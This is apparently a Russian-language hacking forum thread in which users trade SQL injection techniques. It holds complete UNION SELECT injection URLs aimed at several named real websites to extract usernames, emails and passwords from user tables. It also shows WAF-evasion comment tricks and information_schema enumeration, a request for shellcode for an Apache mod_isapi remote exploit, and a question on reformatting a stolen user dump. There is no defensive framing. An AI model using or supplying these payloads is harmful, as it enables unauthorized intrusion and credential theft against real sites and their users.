И еще вопрос-просьба. Кодом шела может кто располагает, для открытия порта под эксплоит "Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit" ?
http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,user_email),4,5,6,7,8,9,10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie= так выводит нормально, как только в запросе ставлю слово user_password , запретка сразу срабатывает...пару таких запросов и бан по айпи...вроде не новичек , но вот как обойти хз..какие мысли?
http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,/*!user_password*/),4,5,6,7,8,9, 10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=
Допустим есть сайт который стоит на одной базе mysql, а цмска стоит на другой к примеру cms.mysql можноли как нить при мускль иньекции с бд user.mysql выдернуть таблици с cms.mysql
если я правильно понимаю, то: 1) структуру базы тащим так: union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema='имя базы' 2) тянем данные так: union+select+1,2,group_conact(login,0x3a,pass)+from+database_name.table_name
это подействует в случае когда конкретно уже знаем какие таблици в базе и поля, знаю что точно есть другая база, как можно с одной просмотреть какие есть таблици и поля в другой базе, для примера: _http://www.indiagatebkk.com/menudetails.php?id=-8+union+select+1,concat_ws(0x3b,version(),database(),user()),3,4,concat_ws(0x3a,name,password)+from+users-- а админка на WP: _http://www.indiagatebkk.com/blog/wp-login.php
там одна база http://www.indiagatebkk.com/menudetails.php?id=-8+union+select+1,2,3,4,group_concat%28schema_name%29+from+information_schema.schemata-- грамотней попытайся задать вопрос
подскажите, _http://www.kemtipp.ru/news.php?id=152' здесь чтот выжать можно? чет у меня запросы не проходят
Можно ли обойти эту авторизацию? Яваскрипт практически не знаю... И почему value постоянно пустая? И сравнивается с пустой... PHP: function validate_auth(frm) { var value = ''; var errFlag = new Array(); var _qfGroups = {}; _qfMsg = ''; value = frm.elements['login'].value; if (value == '' && !errFlag['login']) { errFlag['login'] = true; _qfMsg = _qfMsg + '\n - Введите логин'; } value = frm.elements['pass'].value; if (value == '' && !errFlag['pass']) { errFlag['pass'] = true; _qfMsg = _qfMsg + '\n - Введите пароль'; } if (_qfMsg != '') { _qfMsg = 'Форма заполнена неправильно:' + _qfMsg; _qfMsg = _qfMsg + '\n'; alert(_qfMsg); return false; } return true; } //]]> </script> <form action="http://www.site/admin/" method="post" name="auth" id="auth" onsubmit="try { var myValidator = validate_auth; } catch(e) { return true; } return myValidator(this);">
если чтото в яваскрипте то ты его можешь просто отключить, но бегло просмотрев там проверяется только введен ли логин/пасс или нет
Ну да, ведь паса нет. Отключать тоже пробовал, вместо логина паса значение логина и паса становится _qfMsg. Всеравно, спасибо)
спс а как узнать длину таблицы любой? /**/and/**/length(select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1)=16-- так не работает
Слил mysql дамп табдици юзеров, а как можно снеё выдернуть только нужные колонки и сохранит в формате user;mail;pass?
